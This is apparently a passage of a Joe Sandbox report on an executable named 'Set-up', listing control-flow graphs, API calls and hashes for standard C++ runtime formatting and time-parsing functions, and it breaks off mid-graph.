?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z 226->229 228->229 235 6bc344aa-6bc344cc ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z 228->235 229->225 233 6bc34645-6bc346c2 ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z * 2 call 6bc211fc * 2 call 6bc4381a 230->233 234 6bc345be-6bc34618 ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z 230->234 231->230 239 6bc3461a 234->239 240 6bc3461f-6bc34642 ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z 234->240 235->229 251 6bc343bd-6bc343c7 236->251 241 6bc343ad-6bc343b8 call 6bc306a2 237->241 242 6bc3439c-6bc343a9 call 6bc21926 237->242 239->240 240->233 241->251 242->241 254 6bc343d3-6bc343ef call 6bc306a2 * 2 251->254 255 6bc343c9-6bc343d1 call 6bc21926 251->255 263 6bc343f3-6bc343fe 254->263 255->263 266 6bc34403-6bc3440a 263->266 267 6bc34400 263->267 268 6bc3440f-6bc3441e strcspn 266->268 269 6bc3440c 266->269 267->266 270 6bc34449-6bc3444d 268->270 269->268 271 6bc34420-6bc34422 270->271 272 6bc3444f-6bc34456 270->272 271->272 273 6bc34424-6bc3442e 271->273 274 6bc3445b-6bc3445f 272->274 275 6bc34458 272->275 273->272 276 6bc34430-6bc34445 call 6bc306a2 273->276 274->214 275->274 276->270 279 6bc34447 276->279 279->270
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC34255
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000078,6BC38375,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 6BC3428F
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A9F5: __EH_prolog3.LIBCMT ref: 6BC2A9FC
                                                                                                • Part of subcall function 6BC2A9F5: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA06
                                                                                                • Part of subcall function 6BC2A9F5: int.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA1D
                                                                                                • Part of subcall function 6BC2A9F5: std::locale::_Getfacet.LIBCPMT ref: 6BC2AA26
                                                                                                • Part of subcall function 6BC2A9F5: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA86
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC342ED
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • localeconv.MSVCR100 ref: 6BC34312
                                                                                              • memchr.MSVCR100 ref: 6BC34329
                                                                                              • memchr.MSVCR100 ref: 6BC34339
                                                                                              • strcspn.MSVCR100(00000000,?), ref: 6BC34414
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,00000001), ref: 6BC344B8
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC344DE
                                                                                              • memchr.MSVCR100 ref: 6BC344FC
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC34524
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC34544
                                                                                                • Part of subcall function 6BC24780: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,6BC25408), ref: 6BC24792
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC34590
                                                                                              • memchr.MSVCR100 ref: 6BC345AD
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC345F5
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,00000000,?,6BC11D18,00000001), ref: 6BC3462C
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC345D5
                                                                                                • Part of subcall function 6BC26665: memchr.MSVCR100 ref: 6BC2667A
                                                                                                • Part of subcall function 6BC26665: ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2669E
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC34655
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6BC34675
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,00000000,?,?,?,00000000,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC3469C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_$V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@V32@_$memchr$Putc@?$num_put@_Putgrouped@?$num_put@_$std::locale::facet::_$??1_?getloc@ios_base@std@@?sputc@?$basic_streambuf@_DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcVlocale@2@W@std@@@std@@localeconvstd::_std::locale::_strcspn
                                                                                              • String ID: e
                                                                                              • API String ID: 828282170-4024072794
                                                                                              • Opcode ID: 46a6ddbc5bb2af96e3a14e4a78375f2df25774807c4619fd37396ef1a0931823
                                                                                              • Instruction ID: b5cdf45101e75301490c707db41488d715b2f6185346f0fc24587738f36d0b36
                                                                                              • Opcode Fuzzy Hash: 46a6ddbc5bb2af96e3a14e4a78375f2df25774807c4619fd37396ef1a0931823
                                                                                              • Instruction Fuzzy Hash: 46F16771D10219AFDF01CFE8C985AEEBBB9FF09304F004069E915AB251E7799A15CF61
                                                                                              Function 6BC323C9 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 397stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 280 6bc323c9-6bc32468 call 6bc437c6 ?getloc@ios_base@std@@QBE?AVlocale@2@XZ call 6bc2a8af call 6bc1bba7 call 6bc41491 290 6bc32474 280->290 291 6bc3246a-6bc3246c 280->291 292 6bc3247b-6bc324b0 localeconv memchr * 2 290->292 291->290 293 6bc3246e-6bc32472 291->293 294 6bc324b2 292->294 295 6bc324b5-6bc324bc 292->295 293->292 294->295 296 6bc324c1-6bc324c4 295->296 297 6bc324be 295->297 298 6bc325cb-6bc325de 296->298 299 6bc324ca-6bc324d1 296->299 297->296 302 6bc325f1 298->302 303 6bc325e0 298->303 300 6bc324d3 299->300 301 6bc324d6-6bc324d9 299->301 300->301 301->298 305 6bc324df-6bc324ee call 6bc3154b 301->305 304 6bc325f4-6bc325ff 302->304 306 6bc325e2-6bc325e4 303->306 307 6bc325e6-6bc325e8 303->307 309 6bc32601-6bc32606 304->309 310 6bc3265c-6bc3266e memchr 304->310 318 6bc324f0-6bc324fd call 6bc21926 305->318 319 6bc324ff-6bc32503 305->319 306->302 306->307 307->302 308 6bc325ea-6bc325ef 307->308 308->304 312 6bc32632-6bc32659 ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z 309->312 313 6bc32608-6bc3260b 309->313 314 6bc32674-6bc32718 ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z call 6bc24755 ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z 310->314 315 6bc3271b-6bc3272a memchr 310->315 312->310 313->312 317 6bc3260d-6bc32631 ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z 313->317 314->315 320 6bc327c2-6bc3284a ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z * 2 call 6bc211fc * 2 call 6bc4381a 315->320 321 6bc32730-6bc32790 ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z 315->321 317->312 336 6bc32526-6bc32530 318->336 325 6bc32516-6bc32521 call 6bc306a2 319->325 326 6bc32505-6bc32512 call 6bc21926 319->326 327 6bc32792 321->327 328 6bc32797-6bc327bf ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z 321->328 325->336 326->325 327->328 328->320 339 6bc32532-6bc3253a call 6bc21926 336->339 340 6bc3253c-6bc32558 call 6bc306a2 * 2 336->340 347 6bc3255c-6bc32567 339->347 340->347 350 6bc32569 347->350 351 6bc3256c-6bc32573 347->351 350->351 352 6bc32575 351->352 353 6bc32578-6bc32587 strcspn 351->353 352->353 354 6bc325b2-6bc325b6 353->354 355 6bc32589-6bc3258b 354->355 356 6bc325b8-6bc325bf 354->356 355->356 357 6bc3258d-6bc32597 355->357 358 6bc325c1 356->358 359 6bc325c4-6bc325c8 356->359 357->356 360 6bc32599-6bc325ae call 6bc306a2 357->360 358->359 359->298 360->354 363 6bc325b0 360->363 363->354
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC323D3
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000080,6BC36001,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 6BC32414
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A8AF: __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                                • Part of subcall function 6BC2A8AF: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC2A8AF: int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC2A8AF: std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC2A8AF: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • localeconv.MSVCR100 ref: 6BC3247B
                                                                                              • memchr.MSVCR100 ref: 6BC32492
                                                                                              • memchr.MSVCR100 ref: 6BC324A2
                                                                                              • strcspn.MSVCR100(00000000,?), ref: 6BC3257D
                                                                                              • ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,00000001), ref: 6BC3261D
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC32645
                                                                                              • memchr.MSVCR100 ref: 6BC32663
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC3268E
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?,?,?,?,?,00000000,?), ref: 6BC326AF
                                                                                                • Part of subcall function 6BC24755: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP100(?,?,?,6BC251DF), ref: 6BC24767
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?), ref: 6BC326FE
                                                                                              • memchr.MSVCR100 ref: 6BC3271F
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?,?,?,?,?,00000000,?), ref: 6BC32770
                                                                                              • ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,00000000,?,6BC11D18,00000001), ref: 6BC327A9
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,00000000,?), ref: 6BC3274C
                                                                                                • Part of subcall function 6BC265CE: memchr.MSVCR100 ref: 6BC265E3
                                                                                                • Part of subcall function 6BC265CE: ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC26607
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC327D7
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,00000030,?,?,?,?,?,?,?,?), ref: 6BC327F8
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,00000000,?,?,?,?,?,?,00000000,?,00000030,?,?,?,?,?), ref: 6BC32821
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$V?$ostreambuf_iterator@$D@std@@@2@D@std@@@std@@@std@@V32@$Rep@?$num_put@$memchr$Putc@?$num_put@Putgrouped@?$num_put@$std::locale::facet::_$??1_?getloc@ios_base@std@@?sputc@?$basic_streambuf@D@std@@@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Vlocale@2@localeconvstd::_std::locale::_strcspn
                                                                                              • String ID: e
                                                                                              • API String ID: 312808371-4024072794
                                                                                              • Opcode ID: 9f2d4c7a54e438624fad7f21aebf2dd4445cfe0da42fda2fe46028e2102bd6e2
                                                                                              • Instruction ID: e841fbad59a19da23e439ed113200c777a29362aa5b64c793f69a01c19e44604
                                                                                              • Opcode Fuzzy Hash: 9f2d4c7a54e438624fad7f21aebf2dd4445cfe0da42fda2fe46028e2102bd6e2
                                                                                              • Instruction Fuzzy Hash: 85F17571D11259AFDF01CFA8CC65AEEBBB5FF09300F108059E915AB261E7399A14CFA0
                                                                                              Function 6BC34B06 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 230COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1539 6bc34b06-6bc34b22 1540 6bc34d6a 1539->1540 1541 6bc34b28-6bc34b2f 1539->1541 1542 6bc34d6d-6bc34d7b call 6bc24983 1540->1542 1541->1540 1543 6bc34b63-6bc34b88 1541->1543 1544 6bc34c41-6bc34c5f ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1541->1544 1545 6bc34d40-6bc34d65 1541->1545 1546 6bc34d00-6bc34d08 1541->1546 1547 6bc34cc5-6bc34ccd 1541->1547 1548 6bc34ce4-6bc34ced 1541->1548 1549 6bc34b8a-6bc34b8f 1541->1549 1550 6bc34c28-6bc34c31 1541->1550 1551 6bc34c0f-6bc34c17 1541->1551 1552 6bc34d0d-6bc34d2a ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1541->1552 1553 6bc34bec-6bc34bf3 1541->1553 1554 6bc34c8c-6bc34ca4 call 6bc31909 1541->1554 1555 6bc34c33-6bc34c3f 1541->1555 1556 6bc34cd2-6bc34cd5 1541->1556 1557 6bc34cf2-6bc34cfb 1541->1557 1558 6bc34cd7-6bc34cdf 1541->1558 1559 6bc34b36-6bc34b58 1541->1559 1560 6bc34bb5-6bc34bd2 ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1541->1560 1561 6bc34c74-6bc34c7a 1541->1561 1562 6bc34cb8-6bc34cc0 1541->1562 1563 6bc34c7f-6bc34c87 1541->1563 1564 6bc34c1c-6bc34c23 1541->1564 1583 6bc34d80-6bc34d91 1542->1583 1584 6bc34d7d 1542->1584 1579 6bc34b5b-6bc34b5e 1543->1579 1544->1542 1571 6bc34c65-6bc34c6f 1544->1571 1545->1579 1565 6bc34b92-6bc34bb3 ?_Getfmt@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IBE?AV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@0AAVios_base@2@AAHPAUtm@@PBD@Z 1546->1565 1547->1565 1566 6bc34c25-6bc34c26 1548->1566 1549->1565 1550->1566 1551->1565 1552->1542 1567 6bc34d2c-6bc34d32 1552->1567 1570 6bc34bf5 1553->1570 1554->1540 1585 6bc34caa-6bc34cb3 1554->1585 1555->1570 1572 6bc34c7b-6bc34c7d 1556->1572 1557->1566 1558->1565 1559->1579 1560->1542 1568 6bc34bd8-6bc34bde 1560->1568 1561->1572 1562->1565 1563->1565 1564->1566 1565->1579 1575 6bc34bf7-6bc34c0a ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1566->1575 1577 6bc34be1-6bc34be7 1567->1577 1578 6bc34d38-6bc34d3b 1567->1578 1568->1577 1570->1575 1571->1542 1572->1566 1575->1542 1577->1542 1578->1577 1579->1542 1584->1583 1585->1542
                                                                                              APIs
                                                                                              • ?_Getfmt@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IBE?AV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@0AAVios_base@2@AAHPAUtm@@PBD@Z.MSVCP100(?,?,?,?,?,?,?,?,%m / %d / %y), ref: 6BC34BA6
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?), ref: 6BC34BC5
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000017,?), ref: 6BC34C00
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,0000016E,?,00000001,0000001F,?,%b %d %H : %M : %S %Y), ref: 6BC34C52
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000063,?,%d / %m / %y,00000006,?,%I : %M : %S %p,?,?,?,6BC11D60,0000016E,?), ref: 6BC34D1D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$istreambuf_iterator@_$W@std@@@std@@@std@@$Getint@?$time_get@_W@std@@@2@0$Getfmt@?$time_get@_Utm@@V32@0Vios_base@2@W@std@@@2@
                                                                                              • String ID: %H : %M$%H : %M : S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                              • API String ID: 1774632931-2659852414
                                                                                              • Opcode ID: 1fb5d8aa895e07f6403016475e0f9ceb01c285740a72cd3c37986083cba2f774
                                                                                              • Instruction ID: 28ab19069665dffebdc57f60af2809904ef670f5084a864982c24fa59a53ce28
                                                                                              • Opcode Fuzzy Hash: 1fb5d8aa895e07f6403016475e0f9ceb01c285740a72cd3c37986083cba2f774
                                                                                              • Instruction Fuzzy Hash: D2817572414219EFDB05CF98C981EDA7BB9FF09708F808495F955AA251E33AEB10DB60
                                                                                              Function 6BC34E30 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 230COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1586 6bc34e30-6bc34e4c 1587 6bc34e52-6bc34e59 1586->1587 1588 6bc35094 1586->1588 1587->1588 1589 6bc34fe2-6bc34fea 1587->1589 1590 6bc35001-6bc35009 1587->1590 1591 6bc34e60-6bc34e82 1587->1591 1592 6bc34f46-6bc34f4d 1587->1592 1593 6bc34f6b-6bc34f89 ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1587->1593 1594 6bc3506a-6bc3508f 1587->1594 1595 6bc3502a-6bc35032 1587->1595 1596 6bc34fa9-6bc34fb1 1587->1596 1597 6bc34fef-6bc34ff7 1587->1597 1598 6bc3500e-6bc35017 1587->1598 1599 6bc34e8d-6bc34eb2 1587->1599 1600 6bc34f52-6bc34f5b 1587->1600 1601 6bc35037-6bc35054 ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z 1587->1601 1602 6bc34f16-6bc34f1d 1587->1602 1603 6bc34fb6-6bc34fce call 6bc31909 1587->1603 1604 6bc34eb4-6bc34eb9 1587->1604 1605 6bc34f39-6bc34f41 1587->1605 1606 6bc34edf-6bc34efc 